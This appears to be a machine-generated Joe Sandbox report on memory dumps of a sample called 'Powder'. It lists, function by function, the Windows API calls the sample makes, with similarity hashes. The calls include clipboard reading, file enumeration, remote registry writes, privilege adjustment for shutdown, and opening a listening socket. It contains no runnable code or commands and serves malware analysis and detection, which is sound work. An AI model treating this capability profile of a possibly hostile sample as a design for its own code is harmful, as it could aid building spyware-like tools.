                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: 622545ee6a3a70123115c1b8a2a618203c1f3f9bb8a5033585dbf33e5616a293
                                                  • Instruction ID: 11a8e147c020893680dca690ddc774071e94486eb3989bb095de01892ad85e98
                                                  • Opcode Fuzzy Hash: 622545ee6a3a70123115c1b8a2a618203c1f3f9bb8a5033585dbf33e5616a293
                                                  • Instruction Fuzzy Hash: 74817971901219FFDF219FA0CE49AEE7BB9AF04319F05552AFD10B6262D7318E18DB20
                                                  APIs
                                                  • OpenClipboard.USER32(00E90980), ref: 00E7465C
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E7466A
                                                  • GetClipboardData.USER32(0000000D), ref: 00E74672
                                                  • CloseClipboard.USER32 ref: 00E7467E
                                                  • GlobalLock.KERNEL32(00000000), ref: 00E7469A
                                                  • CloseClipboard.USER32 ref: 00E746A4
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E746B9
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00E746C6
                                                  • GetClipboardData.USER32(00000001), ref: 00E746CE
                                                  • GlobalLock.KERNEL32(00000000), ref: 00E746DB
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E7470F
                                                  • CloseClipboard.USER32 ref: 00E7481F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                  • String ID:
                                                  • API String ID: 3222323430-0
                                                  • Opcode ID: 7ff9282d893e13bdad8d783ed91ed56bef758dc05e71bc621ed481cbe7f172b3
                                                  • Instruction ID: dac6501248c3113e45ef8493261460677b1f4241dfd7a14326a572858504d523
                                                  • Opcode Fuzzy Hash: 7ff9282d893e13bdad8d783ed91ed56bef758dc05e71bc621ed481cbe7f172b3
                                                  • Instruction Fuzzy Hash: 985182B1244205AFD304EF61DC49F6E77E8AF84B51F40552AF65AF21E2DF70D9088B62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E6F5F9
                                                  • _wcscmp.LIBCMT ref: 00E6F60E
                                                  • _wcscmp.LIBCMT ref: 00E6F625
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00E6F637
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00E6F651
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F669
                                                  • FindClose.KERNEL32(00000000), ref: 00E6F674
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F690
                                                  • _wcscmp.LIBCMT ref: 00E6F6B7
                                                  • _wcscmp.LIBCMT ref: 00E6F6CE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F6E0
                                                  • SetCurrentDirectoryW.KERNEL32(00EBB578), ref: 00E6F6FE
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F708
                                                  • FindClose.KERNEL32(00000000), ref: 00E6F715
                                                  • FindClose.KERNEL32(00000000), ref: 00E6F727
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*$S
                                                  • API String ID: 1803514871-3360721001
                                                  • Opcode ID: 673be34066fe21f04dc142a9d4f19e33eef468e8f9fe21ee49a7bdd7276df5db
                                                  • Instruction ID: 21d8a2b5d54f55c32dab653b115d4c5fdbeab35b37616b7d06e94844409b2061
                                                  • Opcode Fuzzy Hash: 673be34066fe21f04dc142a9d4f19e33eef468e8f9fe21ee49a7bdd7276df5db
                                                  • Instruction Fuzzy Hash: 4B31D2726812196EDF20DFB5FC4DADE77ACAF09365F101167E804F20A0DB70DA44CA60
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E6CDD0
                                                  • FindClose.KERNEL32(00000000), ref: 00E6CE24
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6CE49
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6CE60
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E6CE87
                                                  • __swprintf.LIBCMT ref: 00E6CED3
                                                  • __swprintf.LIBCMT ref: 00E6CF16
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • __swprintf.LIBCMT ref: 00E6CF6A
                                                    • Part of subcall function 00E238C8: __woutput_l.LIBCMT ref: 00E23921
                                                  • __swprintf.LIBCMT ref: 00E6CFB8
                                                    • Part of subcall function 00E238C8: __flsbuf.LIBCMT ref: 00E23943
                                                    • Part of subcall function 00E238C8: __flsbuf.LIBCMT ref: 00E2395B
                                                  • __swprintf.LIBCMT ref: 00E6D007
                                                  • __swprintf.LIBCMT ref: 00E6D056
                                                  • __swprintf.LIBCMT ref: 00E6D0A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: fcc5afa6f425d64b65fd195b06895a6231c4a79be015a6573e8f388b32a4037a
                                                  • Instruction ID: 0a70a21ccd953afd9d07914d0f94c72e543965b1f895c3832fed634fd4e31192
                                                  • Opcode Fuzzy Hash: fcc5afa6f425d64b65fd195b06895a6231c4a79be015a6573e8f388b32a4037a
                                                  • Instruction Fuzzy Hash: F3A14CF1404305ABC714EFA4D985DAFB7ECEF94704F40191AF685A61D1EB34EA48CB62
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80FB3
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E90980,00000000,?,00000000,?,?), ref: 00E81021
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E81069
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E810F2
                                                  • RegCloseKey.ADVAPI32(?), ref: 00E81412
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E8141F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: 8b50532058bb654173715bce4339a23f098e381fc496b72db05dd5fa60b520ea
                                                  • Instruction ID: 5b6a32f815f6a7bd9442c5d4de663542fc2f939c270e6596609b27f2e365df07
                                                  • Opcode Fuzzy Hash: 8b50532058bb654173715bce4339a23f098e381fc496b72db05dd5fa60b520ea
                                                  • Instruction Fuzzy Hash: 23029EB12006119FCB14EF25C941E6AB7E5FF88714F04995DF99AAB3A2CB30EC45CB91
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E6F756
                                                  • _wcscmp.LIBCMT ref: 00E6F76B
                                                  • _wcscmp.LIBCMT ref: 00E6F782
                                                    • Part of subcall function 00E64875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E64890
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F7B1
                                                  • FindClose.KERNEL32(00000000), ref: 00E6F7BC
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F7D8
                                                  • _wcscmp.LIBCMT ref: 00E6F7FF
                                                  • _wcscmp.LIBCMT ref: 00E6F816
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F828
                                                  • SetCurrentDirectoryW.KERNEL32(00EBB578), ref: 00E6F846
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F850
                                                  • FindClose.KERNEL32(00000000), ref: 00E6F85D
                                                  • FindClose.KERNEL32(00000000), ref: 00E6F86F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*$j
                                                  • API String ID: 1824444939-4121651432
                                                  • Opcode ID: e29b87d1dfdc04f21f166ae93d4a801fef67d4c4201aff6f6e4ccc961d08a373
                                                  • Instruction ID: b1332bcd73287d350e1873f8ff6850e876acfaa673a33934d2ee0a016b725f4e
                                                  • Opcode Fuzzy Hash: e29b87d1dfdc04f21f166ae93d4a801fef67d4c4201aff6f6e4ccc961d08a373
                                                  • Instruction Fuzzy Hash: 3431F6725812196EDF249BB5FC48ADF77BC9F49365F1011A7F804B31A1DB30DE458A60
                                                  APIs
                                                    • Part of subcall function 00E58E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58E3C
                                                    • Part of subcall function 00E58E20: GetLastError.KERNEL32(?,00E58900,?,?,?), ref: 00E58E46
                                                    • Part of subcall function 00E58E20: GetProcessHeap.KERNEL32(00000008,?,?,00E58900,?,?,?), ref: 00E58E55
                                                    • Part of subcall function 00E58E20: HeapAlloc.KERNEL32(00000000,?,00E58900,?,?,?), ref: 00E58E5C
                                                    • Part of subcall function 00E58E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58E73
                                                    • Part of subcall function 00E58EBD: GetProcessHeap.KERNEL32(00000008,00E58916,00000000,00000000,?,00E58916,?), ref: 00E58EC9
                                                    • Part of subcall function 00E58EBD: HeapAlloc.KERNEL32(00000000,?,00E58916,?), ref: 00E58ED0
                                                    • Part of subcall function 00E58EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E58916,?), ref: 00E58EE1
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E58931
                                                  • _memset.LIBCMT ref: 00E58946
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E58965
                                                  • GetLengthSid.ADVAPI32(?), ref: 00E58976
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00E589B3
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E589CF
                                                  • GetLengthSid.ADVAPI32(?), ref: 00E589EC
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E589FB
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00E58A02
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E58A23
                                                  • CopySid.ADVAPI32(00000000), ref: 00E58A2A
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E58A5B
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E58A81
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E58A95
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 009954d7c4565977d967919659103d8248e89a072107684007191e0a60a4c09c
                                                  • Instruction ID: dd7d560ac2d165fd6c26bc0efb8bbf71644249dbf180ff8621cb46f9949dffef
                                                  • Opcode Fuzzy Hash: 009954d7c4565977d967919659103d8248e89a072107684007191e0a60a4c09c
                                                  • Instruction Fuzzy Hash: DD616971900209BFDF01DFA1DD45EEEBBB9FF44305F44892AE815B6291DB359A08CB60
                                                  APIs
                                                    • Part of subcall function 00E8147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E8040D,?,?), ref: 00E81491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80B0C
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E80BAB
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E80C43
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E80E82
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E80E8F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 8f50f564d8e84b44cc6facb4bf6fea656b26ea1be4742d50a7019d98dc9cea42
                                                  • Instruction ID: 9a2e5022cbef95328fc6ab27d87fe61b7469df2ff693cabd4bb18bc5ee4621b8
                                                  • Opcode Fuzzy Hash: 8f50f564d8e84b44cc6facb4bf6fea656b26ea1be4742d50a7019d98dc9cea42
                                                  • Instruction Fuzzy Hash: 8DE16D71204210AFCB54EF29C991E6BBBE4EF89314F04996DF84DEB2A1DA30ED45CB51
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 00E64451
                                                  • __swprintf.LIBCMT ref: 00E6445E
                                                    • Part of subcall function 00E238C8: __woutput_l.LIBCMT ref: 00E23921
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E64488
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00E64494
                                                  • LockResource.KERNEL32(00000000), ref: 00E644A1
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00E644C1
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00E644D3
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00E644E2
                                                  • LockResource.KERNEL32(?), ref: 00E644EE
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E6454F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: 3d03f8897982355dd0b2d68f68a678808c96f7689f76219faca6090abcc03167
                                                  • Instruction ID: 697123fc23622dec54e4aafaec0aeb4ef2c56595c8ac76cab19164460693cc75
                                                  • Opcode Fuzzy Hash: 3d03f8897982355dd0b2d68f68a678808c96f7689f76219faca6090abcc03167
                                                  • Instruction Fuzzy Hash: C531CFB154121AAFCB119F61ED48EBF7BA9EF04384F404426F912F6191EB74DA21CBA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: d895ba46ced9a540df0c8a4b1bf0efb83464729f4386f15f87fac8f68c647e76
                                                  • Instruction ID: 2485d94a2fe415e0291ff52a4378aefc46909578d4bc3c9398281e4522ee7a67
                                                  • Opcode Fuzzy Hash: d895ba46ced9a540df0c8a4b1bf0efb83464729f4386f15f87fac8f68c647e76
                                                  • Instruction Fuzzy Hash: AA21A3B12012119FEB05AF21ED09F6E77A8EF44721F00801AFA49BB2E2CB30AD15CB55
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E6FA83
                                                  • FindClose.KERNEL32(00000000), ref: 00E6FB96
                                                    • Part of subcall function 00E052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E052E6
                                                  • Sleep.KERNEL32(0000000A), ref: 00E6FAB3
                                                  • _wcscmp.LIBCMT ref: 00E6FAC7
                                                  • _wcscmp.LIBCMT ref: 00E6FAE2
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00E6FB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 2185952417-438819550
                                                  • Opcode ID: 1c433c11c55823ac2b375f2bb5aa2d5fdc9c1e3dd6b4404cf088a0618cc0e927
                                                  • Instruction ID: 4cc7b295d4773b1090a8bb92c28fb2aed8ce87f0e7a8395cfb9c4df60c36a75c
                                                  • Opcode Fuzzy Hash: 1c433c11c55823ac2b375f2bb5aa2d5fdc9c1e3dd6b4404cf088a0618cc0e927
                                                  • Instruction Fuzzy Hash: 5B41817194021A9FDF14DFA4EC59AEEBBB4FF05394F145166E814B22A1EB309E84CF90
                                                  APIs
                                                    • Part of subcall function 00E59399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E593E3
                                                    • Part of subcall function 00E59399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E59410
                                                    • Part of subcall function 00E59399: GetLastError.KERNEL32 ref: 00E5941D
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00E657B4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 7e02972c419b72f885197a1f92a6471ed9faaa43fbc3fdbb0b22fd1bf0f8c2f4
                                                  • Instruction ID: 5b8ab83780cfe4e7e0e4d6baa5d0260c5e6e35f9f7606f8305b64b1cbd01682b
                                                  • Opcode Fuzzy Hash: 7e02972c419b72f885197a1f92a6471ed9faaa43fbc3fdbb0b22fd1bf0f8c2f4
                                                  • Instruction Fuzzy Hash: 6001F7337D0712EEE72866A5BC8ABFB7298AB047C5F202527FC63F20D2E9507C048554
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E769C7
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E769D6
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00E769F2
                                                  • listen.WSOCK32(00000000,00000005), ref: 00E76A01
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E76A1B
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00E76A2F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 4af5a31dbdd65de2de93cfc4085c4e9485b85c02b31ad48dd4882f219087802f
                                                  • Instruction ID: a0cb9cdff895ad874f99730af23f8a37f20bf873b54ea326e4b3cc8f647990d4
                                                  • Opcode Fuzzy Hash: 4af5a31dbdd65de2de93cfc4085c4e9485b85c02b31ad48dd4882f219087802f
                                                  • Instruction Fuzzy Hash: 8921EE71200A019FCB10EF68C989A6EB7F9EF44728F10955AE95AB73D1CB30AC45CB90
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E01DD6
                                                  • GetSysColor.USER32(0000000F), ref: 00E01E2A
                                                  • SetBkColor.GDI32(?,00000000), ref: 00E01E3D
